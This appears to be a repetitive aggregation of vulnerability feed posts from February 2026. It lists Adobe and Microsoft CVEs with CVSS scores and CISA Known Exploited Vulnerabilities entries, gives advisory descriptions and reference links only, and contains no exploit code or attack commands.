🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21349/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:41
2 posts
🟠 CVE-2026-21347 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21347/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21347 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21347/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:41
2 posts
🟠 CVE-2026-21345 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21345/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21345 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21345/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:41
2 posts
🟠 CVE-2026-21353 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21353/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21353 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21353/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:37
2 posts
🟠 CVE-2026-21341 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21341/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21341 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21341/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:37
2 posts
🟠 CVE-2026-21342 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21342/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21342 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21342/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:36
2 posts
🟠 CVE-2026-1848 - High (7.5)
Connections received from the proxy port may not count towards total accepted connections, resulting in server crashes if the total number of connections exceeds available resources. This only applies to connections accepted from the proxy port, p...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1848/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1848 - High (7.5)
Connections received from the proxy port may not count towards total accepted connections, resulting in server crashes if the total number of connections exceeds available resources. This only applies to connections accepted from the proxy port, p...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1848/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:29
12 posts
A critical zero-day vulnerability in Microsoft Word, identified as CVE-2026-21514, has been disclosed. The flaw is being actively exploited in the wild.
https://cybersecuritynews.com/microsoft-office-word-0-day-vulnerability/
🟠 CVE-2026-21514 - High (7.8)
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21514/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21514
CVE-2026-21514
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21514
🛡️ CWE: CWE-807
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21514
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21514
Vendor: Microsoft
Product: Office
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21514
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🟠 CVE-2026-21514 - High (7.8)
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21514/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21514
CVE-2026-21514
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21514
🛡️ CWE: CWE-807
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21514
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21514
Vendor: Microsoft
Product: Office
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21514
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:31:29
10 posts
Critical Windows RasMan Zero-Day Exploited: February 2026 Patch Released
Microsoft has urgently released security updates on February 10, 2026, to fix a critical zero-day vulnerability in the Windows Remote Access Connection Manager (RasMan) service. This flaw, tracked as CVE-2026-21525, is actively exploited in the wild, enabling attackers to crash systems and disrupt remote connections—a serious concern for organizations relying on VPNs, remote desktops, and other…
https://undercodenews.com/critical-windows-rasman-zero-day-exploited-february-2026-patch-released/
##🔐 CVE-2026-21525
CVE-2026-21525
Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.
📊 CVSS Score: 6.2
⚠️ Severity: Medium
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21525
🛡️ CWE: CWE-476
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21525
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21525
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21525
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🔐 CVE-2026-21525
CVE-2026-21525
Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.
📊 CVSS Score: 6.2
⚠️ Severity: Medium
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21525
🛡️ CWE: CWE-476
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21525
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21525
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21525
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:31:29
13 posts
age-verification concerns.
- Windows security flaws: multiple 2026 CVEs (Notepad RCE CVE-2026-20841; MSHTML; CVE-2026-21510/13/19/25/33) and ongoing Patch Tuesday updates.
- AI and work: productivity boosts but rising cognitive load and burnout; AI adoption altering job markets and roles.
- Open/indie web and OSS: growing use of Pixelfed, Matrix, Zulip; open-source Discord alternatives (Stoat chat); broader Fediverse/indie-web movement.
- Space/AI funding and policy: [2/3]
🟠 CVE-2026-21510 - High (8.8)
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21510/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21510
CVE-2026-21510
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21510
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21510
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
